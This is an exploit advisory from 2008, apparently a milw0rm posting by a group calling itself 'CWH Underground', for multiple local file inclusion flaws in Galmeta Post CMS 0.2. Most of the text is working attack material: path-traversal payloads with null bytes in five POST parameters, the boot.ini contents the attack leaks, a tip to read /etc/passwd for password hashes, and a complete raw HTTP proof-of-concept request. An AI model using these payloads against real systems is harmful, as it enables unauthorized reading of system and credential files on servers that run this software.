================================================================== Galmeta Post CMS Multiple Local File Inclusion Vulnerabilities ================================================================== ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 26 June 2008 SITE : cwh.citec.us ##################################################### APPLICATION : Galmeta Post CMS VERSION : 0.2 VENDOR : N/A DOWNLOAD : http://downloads.sourceforge.net/galmetapost ##################################################### --- Multiple Local File Inclusion [POST Method] --- ---------- Exploits ---------- [+] http://[Target]/[post_blog_path]/_lib/adodb_lite/tests/test_adodb_lite.php [-] databasetype=../../../../../../../boot.ini%00&transactions=transaction%3A&adodblite=adodblite%3A&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit [-] databasetype=mysql&transactions=../../../../../../../boot.ini%00&adodblite=adodblite%3A&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit [-] databasetype=mysql&transactions=transaction%3A&adodblite=../../../../../../../boot.ini%00&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit [-] databasetype=mysql&transactions=transaction&adodblite=adodblite%3A&extend=../../../../../../../boot.ini%00&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit [-] databasetype=mysql&transactions=transaction&adodblite=adodblite%3A&extend=extend%3A&date=../../../../../../../../boot.ini%00&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit This exploit will open boot.ini in system file: [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1) \WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1) \WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect You can change boot.ini to /etc/passwd%00 in linux OS, For view pass hash. ------------- POC Exploit ------------- [+] POST Method [+] [+] POST http://192.168.24.25/post_blog/_lib/adodb_lite/tests/test_adodb_lite.php HTTP/1.0 [+] Accept: */* [+] Content-Type: application/x-www-form-urlencoded [+] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) [+] Host: 192.168.24.25 [+] Content-Length: 309 [+] Cookie: PHPSESSID=842f465924119eaa2b0fd3664fcc3b14 [+] Connection: Close [+] [+] databasetype=../../../../../../../boot.ini%00&transactions=transaction%3A&adodblite=adodblite%3A&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit ################################################################## # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## # milw0rm.com [2008-06-26]